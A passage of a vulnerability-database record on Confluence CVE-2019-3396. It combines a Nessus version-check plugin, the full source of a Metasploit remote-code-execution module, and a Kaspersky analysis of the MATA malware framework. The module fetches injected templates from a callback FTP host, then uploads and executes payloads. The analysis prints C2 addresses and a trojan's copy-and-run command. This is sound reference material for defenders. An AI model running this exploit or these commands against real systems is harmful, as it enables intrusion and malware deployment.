An\n attacker can exploit this, via unspecified vectors, to\n send arbitrary HTTP and WebDAV requests from the\n application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget\n Connector due to improper input validation. An attacker\n can exploit this, via unspecified vectors, to traverse\n directories or execute arbitrary code. (CVE-2019-3396)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 9, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-03-22T00:00:00", "title": "Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-3395", "CVE-2019-3396"], "modified": "2019-03-22T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_6_6_12.NASL", "href": "https://www.tenable.com/plugins/nessus/123008", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123008);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/01\");\n\n script_cve_id(\"CVE-2019-3395\", \"CVE-2019-3396\");\n script_bugtraq_id(107543);\n script_xref(name:\"IAVA\", value:\"2019-A-0135-S\");\n\n script_name(english:\"Atlassian Confluence < 6.6.12 / 6.7.x < 6.12.3 / 6.13.x < 6.13.3 / 6.14.x < 6.14.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Atlassian Confluence version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian\nConfluence application running on the remote host is prior to 6.6.12,\n6.7.x prior to 6.12.3, 6.13.x prior to 6.13.3, or 
6.14.x prior to\n6.14.2. It is, therefore, affected by the following vulnerabilities :\n\n - A server-side request forgery (SSRF) exists in the\n WebDAV plugin due to improper input validation. An\n attacker can exploit this, via unspecified vectors, to\n send arbitrary HTTP and WebDAV requests from the\n application. (CVE-2019-3395)\n\n - A server-side template injection exists in the Widget\n Connector due to improper input validation. An attacker\n can exploit this, via unspecified vectors, to traverse\n directories or execute arbitrary code. (CVE-2019-3396)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8e8304c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.6.12, 6.12.3, 6.13.3,\n6.14.2, 6.15.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-3396\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Confluence File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Widget Connector 
Macro Velocity Template Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/22\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp_name = \"confluence\";\n\nport = get_http_port(default:80);\n\napp_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"fixed_version\": \"6.6.12\" },\n {\"min_version\": \"6.7.0\", \"fixed_version\": \"6.12.3\", \"fixed_display\": \"6.12.3 / 6.15.1\"},\n {\"min_version\": \"6.13.0\", \"fixed_version\": \"6.13.3\", \"fixed_display\": \"6.13.3 / 6.15.1\" },\n {\"min_version\": \"6.14.0\", \"fixed_version\": \"6.14.2\", \"fixed_display\": \"6.14.2 / 6.15.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-15T08:21:21", "description": "Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is unrequired to exploit this vulnerability. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. 
This vulnerability was originally discovered by Daniil Dmitriev https://twitter.com/ddv_ua.\n", "published": "2019-04-11T12:55:51", "type": "metasploit", "title": "Atlassian Confluence Widget Connector Macro Velocity Template Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-3396"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/CONFLUENCE_WIDGET_CONNECTOR", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::FtpServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\",\n 'Description' => %q{\n Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\n allows embed online videos, slideshows, photostreams and more directly into page.\n A _template parameter can be used to inject remote Java code into a Velocity template,\n and gain code execution. 
Authentication is unrequired to exploit this vulnerability.\n By default, Java payload will be used because it is cross-platform, but you can also\n specify which native payload you want (Linux or Windows).\n\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\n\n This vulnerability was originally discovered by Daniil Dmitriev\n https://twitter.com/ddv_ua.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniil Dmitriev', # Discovering vulnerability\n 'Dmitry (rrock) Shchannikov' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2019-3396' ],\n [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],\n [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-%E3%80%90CVE-2019-3396%E3%80%91-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],\n [ 'URL', 'https://paper.seebug.org/886/']\n ],\n 'Targets' =>\n [\n [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],\n [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\n [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8090,\n 'SRVPORT' => 8021,\n },\n 'Privileged' => false,\n 'DisclosureDate' => '2019-03-25',\n 'DefaultTarget' => 0,\n 'Stance' => Msf::Exploit::Stance::Aggressive\n ))\n\n register_options(\n [\n OptAddress.new('SRVHOST', [true, 'Callback address for template loading']),\n OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),\n OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',\n 'https://www.youtube.com/watch?v=kxopViU98Xo'])\n ])\n end\n\n # Handles ftp RETP command.\n #\n # @param c [Socket] Control connection socket.\n # @param arg [String] RETR argument.\n # @return [void]\n def on_client_command_retr(c, arg)\n vprint_status(\"FTP download request for #{arg}\")\n conn = establish_data_connection(c)\n 
if(not conn)\n c.put(\"425 Can't build data connection\\r\\n\")\n return\n end\n\n c.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\")\n case arg\n when /check\\.vm$/\n conn.put(wrap(get_check_vm))\n when /javaprop\\.vm$/\n conn.put(wrap(get_javaprop_vm))\n when /upload\\.vm$/\n conn.put(wrap(get_upload_vm))\n when /exec\\.vm$/\n conn.put(wrap(get_exec_vm))\n else\n conn.put(wrap(get_dummy_vm))\n end\n c.put(\"226 Transfer complete.\\r\\n\")\n conn.close\n end\n\n # Handles ftp PASS command to suppress output.\n #\n # @param c [Socket] Control connection socket.\n # @param arg [String] PASS argument.\n # @return [void]\n def on_client_command_pass(c, arg)\n @state[c][:pass] = arg\n vprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\")\n c.put \"230 Login OK\\r\\n\"\n end\n\n # Handles ftp EPSV command to suppress output.\n #\n # @param c [Socket] Control connection socket.\n # @param arg [String] EPSV argument.\n # @return [void]\n def on_client_command_epsv(c, arg)\n vprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\")\n c.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\")\n end\n\n # Returns a upload template.\n #\n # @return [String]\n def get_upload_vm\n (\n <<~EOF\n $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\n EOF\n )\n end\n\n # Returns a command execution template.\n #\n # @return [String]\n def get_exec_vm\n (\n <<~EOF\n $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()\n EOF\n )\n end\n\n # Returns checking template.\n #\n # @return [String]\n def get_check_vm\n (\n <<~EOF\n #{@check_text}\n EOF\n )\n end\n\n # Returns Java's getting property template.\n #\n # @return [String]\n def get_javaprop_vm\n (\n 
<<~EOF\n $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()\n EOF\n )\n end\n\n # Returns dummy template.\n #\n # @return [String]\n def get_dummy_vm\n (\n <<~EOF\n EOF\n )\n end\n\n # Checks the vulnerability.\n #\n # @return [Array] Check code\n def check\n checkcode = Exploit::CheckCode::Safe\n begin\n # Start the FTP service\n print_status(\"Starting the FTP server.\")\n start_service\n\n @check_text = Rex::Text.rand_text_alpha(5..10)\n res = inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}check.vm\")\n if res && res.body && res.body.include?(@check_text)\n checkcode = Exploit::CheckCode::Vulnerable\n end\n rescue Msf::Exploit::Failed => e\n vprint_error(e.message)\n checkcode = Exploit::CheckCode::Unknown\n end\n checkcode\n end\n\n # Injects Java code to the template.\n #\n # @param service_url [String] Address of template to injection.\n # @return [void]\n def inject_template(service_url, timeout=20)\n\n uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'headers' => {\n 'Accept' => '*/*',\n 'Origin' => full_uri(vhost_uri: true)\n },\n 'ctype' => 'application/json; charset=UTF-8',\n 'data' => {\n 'contentId' => '1',\n 'macro' => {\n 'name' => 'widget',\n 'body' => '',\n 'params' => {\n 'url' => datastore['TRIGGERURL'],\n '_template' => service_url\n }\n\n }\n }.to_json\n }, timeout=timeout)\n\n unless res\n unless service_url.include?(\"exec.vm\")\n print_warning('Connection timed out in #inject_template')\n end\n return\n end\n\n if res.body.include? 
'widget-error'\n print_error('Failed to inject and execute code:')\n else\n vprint_status(\"Server response:\")\n end\n\n vprint_line(res.body)\n\n res\n end\n\n # Returns a system property for Java.\n #\n # @param prop [String] Name of the property to retrieve.\n # @return [String]\n def get_java_property(prop)\n @prop = prop\n res = inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\")\n if res && res.body\n return clear_response(res.body)\n end\n ''\n end\n\n # Returns the target platform.\n #\n # @return [String]\n def get_target_platform\n return get_java_property('os.name')\n end\n\n # Checks if the target os/platform is compatible with the module target or not.\n #\n # @return [TrueClass] Compatible\n # @return [FalseClass] Not compatible\n def target_platform_compat?(target_platform)\n target.platform.names.each do |n|\n if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)\n return true\n end\n end\n\n false\n end\n\n # Returns a temp path from the remote target.\n #\n # @return [String]\n def get_tmp_path\n return get_java_property('java.io.tmpdir')\n end\n\n # Returns the Java home path used by Confluence.\n #\n # @return [String]\n def get_java_home_path\n return get_java_property('java.home')\n end\n\n # Returns Java code that can be used to inject to the template in order to copy a file.\n #\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\n # It is meant to be used with #get_write_file_code.\n #\n # @param fname [String] The file to copy\n # @param new_fname [String] The new file\n # @return [void]\n def get_dup_file_code(fname, new_fname)\n if fname =~ /^\\/[[:print:]]+/\n @command = \"cp #{fname} #{new_fname}\"\n else\n @command = \"cmd.exe /C copy #{fname} #{new_fname}\"\n end\n\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\n end\n\n # Returns the normalized file path for payload.\n #\n # @return 
[String]\n def normalize_payload_fname(tmp_path, fname)\n # A quick way to check platform insteaf of actually grabbing os.name in Java system properties.\n if /^\\/[[:print:]]+/ === tmp_path\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\n else\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\n end\n end\n\n # Exploits the target in Java platform.\n #\n # @return [void]\n def exploit_as_java\n\n tmp_path = get_tmp_path\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\n @b64 = Rex::Text.encode_base64(payload.encoded_jar)\n @command = ''\n\n java_home = get_java_home_path\n\n if java_home.blank?\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\n else\n vprint_status(\"Found Java home path: #{java_home}\")\n end\n\n register_files_for_cleanup(@fname)\n\n if /^\\/[[:print:]]+/ === @fname\n normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')\n @command = %Q|#{normalized_java_path} -jar #{@fname}|\n else\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe')\n @fname.gsub!(/Program Files/, 'PROGRA~1')\n @command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}|\n end\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n print_status(\"Attempting to execute #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\n end\n\n\n # Exploits the target in Windows platform.\n #\n # @return [void]\n def exploit_as_windows\n tmp_path = get_tmp_path\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\n @fname = 
normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\n new_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\n @fname.gsub!(/Program Files/, 'PROGRA~1')\n new_fname.gsub!(/Program Files/, 'PROGRA~1')\n register_files_for_cleanup(@fname, new_fname)\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n print_status(\"Attempting to copy payload to #{new_fname}\")\n get_dup_file_code(@fname, new_fname)\n\n print_status(\"Attempting to execute #{new_fname}\")\n @command = new_fname\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\n end\n\n\n # Exploits the target in Linux platform.\n #\n # @return [void]\n def exploit_as_linux\n tmp_path = get_tmp_path\n\n if tmp_path.blank?\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\n end\n\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\n @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\n register_files_for_cleanup(@fname, new_fname)\n\n print_status(\"Attempting to upload #{@fname}\")\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\n\n @command = \"chmod +x #{@fname}\"\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\n\n print_status(\"Attempting to copy payload to #{new_fname}\")\n get_dup_file_code(@fname, new_fname)\n\n print_status(\"Attempting to execute #{new_fname}\")\n @command = new_fname\n inject_template(\"ftp://#{srvhost}:#{srvport}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\n end\n\n def exploit\n @wrap_marker = Rex::Text.rand_text_alpha(5..10)\n\n # Start the FTP service\n print_status(\"Starting the FTP server.\")\n start_service\n\n 
target_platform = get_target_platform\n if target_platform.empty?\n fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".')\n else\n print_status(\"Target being detected as: #{target_platform}\")\n end\n\n unless target_platform_compat?(target_platform)\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\n end\n\n case target.name.downcase\n when /java$/\n exploit_as_java\n when /windows$/\n exploit_as_windows\n when /linux$/\n exploit_as_linux\n end\n end\n\n # Wraps request.\n #\n # @return [String]\n def wrap(string)\n \"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\"\n end\n\n # Returns unwrapped response.\n #\n # @return [String]\n def clear_response(string)\n if match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m)\n return match.captures[0]\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/confluence_widget_connector.rb"}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "cvelist": ["CVE-2019-3396"], "description": "\n\nAs the IT and OT environment becomes more complex, adversaries are quick to adapt their attack strategy. For example, as users' work environments diversify, adversaries are busy acquiring the TTPs to infiltrate systems. Recently, we reported to our Threat Intelligence Portal customers a similar malware framework that internally we called MATA. The MATA malware framework possesses several components, such as loader, orchestrator and plugins. This comprehensive framework is able to target Windows, Linux and macOS operating systems.\n\nThe first artefacts we found relating to MATA were used around April 2018. After that, the actor behind this advanced malware framework used it aggressively to infiltrate corporate entities around the world. 
We identified several victims from our telemetry and figured out the purpose of this malware framework.\n\n## Windows version of MATA\n\nThe Windows version of MATA consists of several components. According to our telemetry, the actor used loader malware to load the encrypted next-stage payload. We're not certain that the loaded payload is the orchestrator malware, but almost all victims have the loader and orchestrator on the same machine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08145951/sl_mata_01.png>)\n\n**_Components of the Windows version of MATA_**\n\n### Loader\n\nThis loader takes a hard-coded hex string, converts it to binary and AES-decrypts it in order to obtain the path to the payload file. Each loader has a hard-coded path from which to load the encrypted payload. The payload file is then AES-decrypted and loaded.\n\nFrom the loader malware found on one of the compromised victims, we discovered that the parent process which executes the loader malware is "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe". WmiPrvSE.exe is the "WMI Provider Host" process, and a loader spawned by it usually means the actor executed this loader malware from a remote host to move laterally. Therefore, we assess that the actor used this loader to compromise additional hosts in the same network.\n\n### Orchestrator and plugins\n\nWe discovered the orchestrator malware in the lsass.exe process on victims' machines. This orchestrator malware loads encrypted configuration data from a registry key and decrypts it with the AES algorithm. If the registry value does not exist, the malware uses hard-coded configuration data. 
The following is a configuration value example from one orchestrator malware sample:\n\n**Field** | **Value** \n---|--- \n**Victim ID** | Random 24-bit number \n**Internal version number** | 3.1.1 (0x030101) \n**Timeout** | 20 minutes \n**C2 addresses** | 108.170.31[.]81:443, 192.210.239[.]122:443, 111.90.146[.]105:443 \n**Disk path or URL of plugin (up to 15) to be loaded on start** | Not used in this malware \n \nThe orchestrator can load up to 15 plugins at the same time. There are three ways to load them:\n\n * Download the plugin from the specified HTTP or HTTPS server\n * Load the AES-encrypted plugin file from a specified disk path\n * Download the plugin file from the current MataNet connection\n\nThe malware authors call their infrastructure MataNet. For covert communication, they employ TLS 1.2 connections with the help of the "openssl-1.1.0f" open source library, which is statically linked inside this module. Additionally, the traffic between MataNet nodes is encrypted with a random RC4 session key. MataNet implements both client and server mode. In server mode the certificate file "c_2910.cls" and the private key file "k_3872.cls" are loaded for TLS encryption. However, this mode is never used.\n\nThe MataNet client establishes periodic connections with its C2. Every message has a 12-byte-long header, where the first DWORD is the message ID and the rest is auxiliary data, as described in the table below:\n\n**Message ID** | **Description** \n---|--- \n0x400 | Complete the current MataNet session and delay the next session until the number of logical drives changes or a new active user session is started. \n0x500 | Delete the configuration registry key and stop MATA execution until the next reboot. \n0x601 | Send configuration data to the C2. \n0x602 | Download and set new configuration data. \n0x700 | Send the C2 basic information about the infected host, such as victim ID, internal version number, Windows version, computer name, user name, IP address and MAC address. 
\n0x701 | Send the C2 the configuration settings, such as victim ID, internal version number and session timeout. \n \nThe main functionality of the orchestrator is loading each plugin file and executing it in memory. Each plugin is a DLL that provides an interface for the orchestrator and rich functionality for controlling the infected machine.\n\n**Plugin name** | **Description** \n---|--- \nMATA_Plug_Cmd.dll | Run "cmd.exe /c" or "powershell.exe" with the specified parameters, and receive the output of the command execution. \nMATA_Plug_Process.dll | Manipulate processes (list processes, kill a process, create a process, create a process with the logged-on user's session ID). \nMATA_Plug_TestConnect.dll | Check TCP connectivity to a given IP:port or IP range; ping a given host or IP range. \nMATA_Plug_WebProxy.dll | Create an HTTP proxy server. The server listens for incoming TCP connections on the specified port, processes CONNECT requests from clients to the HTTP server and forwards all traffic between client and server. \nMATA_Plug_File.dll | Manipulate files (write received data to a given file, send a given file after LZNT1 compression, compress a given folder to %TEMP%\\~DESKTOP[8random hex].ZIP and send it, wipe a given file, search for files, list files and folders, timestomp a file). \nMATA_Plug_Load.dll | Inject a DLL file into the given process using PID and process name, or inject an XORed DLL file into the given process, optionally calling an export function with arguments. \nMATA_Plug_P2PReverse.dll | Connect to a MataNet server on one side and an arbitrary TCP server on the other, then forward traffic between them. IPs and ports for both sides are specified in the call to this interface. \n \nThere is an interesting string inside the MATA_Plug_WebProxy plugin \u2013 "Proxy-agent: _matt-dot-net_" \u2013 which is a reference to Matt McKnight's [open source project](<https://www.codeproject.com/Articles/93301/Implementing-a-Multithreaded-HTTP-HTTPS-Debugging>). 
There are some differences though. Matt's project is written in C# rather than C++. The MATA proxy is noticeably simpler, as there is no cache and no SSL support, for instance. It's possible that MATA's authors found and used the source code of an early version of Matt's proxy server. It looks like the malware author rewrote the code from C# to C++ but left this footprint unchanged.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150311/sl_mata_02.png>)\n\n**_Proxy-agent of MATA_Plug_WebProxy.dll plugin_**\n\n## Non-Windows version of MATA\n\nThe MATA framework targets not only the Windows system but also Linux and macOS systems.\n\n### Linux version\n\nDuring our research, we also found a package containing different MATA files together with a set of hacking tools. In this case, the package was found on a legitimate distribution site, which might indicate that this is the way the malware was distributed. It included a Windows MATA orchestrator, a Linux tool for listing folders, scripts for exploiting Atlassian Confluence Server (CVE-2019-3396), a legitimate [socat tool](<http://www.dest-unreach.org/socat>) and a Linux version of the MATA orchestrator bundled together with a set of plugins. China-based security vendor Netlab also [published](<https://blog.netlab.360.com/dacls-the-dual-platform-rat-en/>) a highly detailed blog on this malware.\n\nThe module is designed to run as a daemon. Upon launch, the module checks if it is already running by reading the PID from "/var/run/init.pid" and checks if the "/proc/%pid%/cmdline" file content is equal to "/flash/bin/mountd". Note that "/flash/bin/mountd" is an unusual path for standard Linux desktop or server installations. This path suggests that MATA's Linux targets are diskless network devices such as routers, firewalls or IoT devices based on x86_64. The module can be run with the "/pro" switch to skip the "init.pid" check. 
The AES-encrypted configuration is stored in the "$HOME/.memcache" file. The behavior of this module is the same as that of the Windows MATA orchestrator described above. The plugin names of Linux MATA and the corresponding Windows plugins are:\n\n**Linux plugin** | **Corresponding Windows plugin** \n---|--- \n/bin/bash | MATA_Plug_Cmd \nplugin_file | MATA_Plug_File \nplugin_process | MATA_Plug_Process \nplugin_test | MATA_Plug_TestConnect \nplugin_reverse_p2p | MATA_Plug_P2PReverse \n \nNote that the Linux version of MATA also has a _logsend_ plugin. This plugin implements an interesting new feature, a "scan" command that tries to establish TCP connections to ports 8291 (used for administration of MikroTik RouterOS devices) and 8292 ("Bloomberg Professional" software) on random IP addresses, excluding addresses belonging to private networks. Any successful connection is logged and sent to the C2. These logs might be used by the attackers for target selection.\n\n### macOS version\n\nWe discovered another MATA malware sample, targeting macOS, uploaded to VirusTotal on April 8, 2020. The malicious Apple Disk Image file is a Trojanized macOS application based on an open-source two-factor authentication application named [MinaOTP](<https://github.com/MinaOTP/MinaOTP-MAC>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150419/sl_mata_03.png>)\n\n**_Trojanized macOS application_**\n\nThe Trojanized main TinkaOTP module is responsible for moving the malicious Mach-O file to the Library folder and executing it using the following command: \ncp TinkaOTP.app/Contents/Resources/Base.lproj/**SubMenu.nib** ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1\n\nUpon launch, this malicious Mach-O file loads the initial configuration file from "/Library/Caches/com.apple.appstotore.db".\n\nLike the strains running on the other platforms, the macOS MATA malware also runs on a plugin basis. 
Its plugin list is almost identical to the Linux version, except that it also contains a plugin named "plugin_socks". The "plugin_socks" plugin is similar to "plugin_reverse_p2p" and is responsible for configuring proxy servers.\n\n## Victims\n\nBased on our telemetry, we have been able to identify several victims who were infected by the MATA framework. The infection is not restricted to a specific territory. Victims were recorded in Poland, Germany, Turkey, Korea, Japan and India. Moreover, the actor compromised systems in various industries, including a software development company, an e-commerce company and an internet service provider.\n\nWe assess that MATA was used by an APT actor, and from one victim we identified one of their intentions. After deploying MATA malware and its plugins, the actor attempted to find the victim's databases and execute several database queries to acquire customer lists. We're not sure if they completed the exfiltration of the customer database, but it's certain that customer databases from victims are one of their interests. In addition, MATA was used to distribute VHD ransomware to one victim, something that will be described in detail in an upcoming blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150538/sl_mata_04.png>)\n\n**_Victims of MATA_**\n\n## Attribution\n\nWe assess that the MATA framework is linked to the Lazarus APT group. 
The MATA orchestrator uses two unique filenames, c_2910.cls and k_3872.cls, which have only previously been seen in several Manuscrypt variants, including the samples (0137f688436c468d43b3e50878ec1a1f) [mentioned](<https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF>) in the US-CERT publication.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150700/sl_mata_05.png>)\n\n**_Unique file name_**\n\nMoreover, MATA uses global configuration data including a randomly generated session ID, date-based version information, a sleep interval and multiple C2s and C2 server addresses. We've seen that one of the Manuscrypt variants (ab09f6a249ca88d1a036eee7a02cdd16) shares a similar configuration structure with the MATA framework. This old Manuscrypt variant is an active backdoor that has similar configuration data such as session ID, sleep interval, number of C2 addresses, infected date, and C2 addresses. They are not identical, but they have a similar structure.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150744/sl_mata_06.png>)\n\n_**Manuscrypt configuration structure** _\n\n## Conclusion\n\nThe MATA framework is significant in that it is able to target multiple platforms: Windows, Linux and macOS. In addition, the actor behind this advanced malware framework utilized it for a type of cybercrime attack that steals customer databases and distributes ransomware. 
